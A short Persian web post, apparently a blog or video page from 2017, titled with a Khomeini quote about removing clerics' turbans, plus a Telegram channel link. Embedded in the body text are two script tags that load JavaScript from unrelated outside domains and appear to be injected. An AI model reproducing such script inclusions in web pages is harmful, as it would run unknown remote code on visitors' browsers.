امام خمینی:جوانها عمامه این علما را بردارند!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>برای دریافت سایر محصولات به کانال زیر در تلگرام مراجعه کنید:
https://t.me/cheraaq<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1396/5/10 ساعت 09:45 2017-8-1 09:45:49
چراغ
توسط چراغ


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر